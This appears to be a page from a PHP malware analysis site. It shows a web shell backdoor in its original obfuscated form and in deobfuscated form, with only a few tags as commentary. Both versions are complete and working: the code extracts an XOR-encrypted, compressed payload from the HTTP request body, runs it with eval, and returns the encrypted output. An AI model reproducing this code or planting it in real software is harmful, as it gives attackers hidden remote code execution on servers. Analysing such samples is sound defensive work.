PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
base64_encode
Execution
eval

Deobfuscated code

<?php

$r = 'strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c = '$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q = '"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k = '1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F = '61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
$t = "create_function";
$X = ');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R = '1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P = 'as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
$K = "\$k=\"e91a7330\";\$kh=\"bac1fe3ab27e\";\$kf=\"69a465d59f59\";\$p=\"l6XsGm7QunglLPBj\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$p = function () {
    $k = "e91a7330";
    $kh = "bac1fe3ab27e";
    $kf = "69a465d59f59";
    $p = "l6XsGm7QunglLPBj";
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    if (@preg_match("/bac1fe3ab27e(.+)69a465d59f59/", @file_get_contents("php://input"), $m) == 1) {
        @ob_start();
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
$p();

Original code

<?php
$r='strlen1H($t);$o=1H""1H;for($i=0;$i<1H$l;1H){f1Hor($j=0;($j<$c&1H&$i<$1Hl';
$c='$k="e91a1H1H1H7330";$1Hkh="b1Hac11Hfe3ab27e";$kf="1H69a41H65d59f1H59";$p="l';
$Q='"),$m)=1H=1) {@1Ho1Hb_s1Htart();@eva1Hl(@g1Hzu1H1Hncompress(@x(@bas1H1He64_decode(';
$k='1H$m[1]),$k)))1H;$o=@o1Hb1H_get_cont1Hents()1H;@ob_end1H_c1H1Hlean();$r=@b1H';
$F='61HXsGm1H7Qungl1HL1HPBj";function x(1H$t,$k){1H$c=str1Hl1Hen($1Hk);$l=1H';
$t=str_replace('D','','crDeDDDate_funDcDtion');
$X=');$j++1H,$1Hi++){$o1H1H.=$t{$i1H}^$k{$j};}1H}return 1H$o;1H}if (@1Hpreg';
$R='1H_match("/$k1H1Hh(.+)1H$kf/",@file1H1H_get_contents1H("ph1Hp://input1H';
$P='as1He64_encod1He(@x(@gzco1Hmpr1Hess($o)1H,$k));1Hprint(1H"$p$kh$r1H$kf");}';
$K=str_replace('1H','',$c.$F.$r.$X.$R.$Q.$k.$P);
$p=$t('',$K);$p();
?>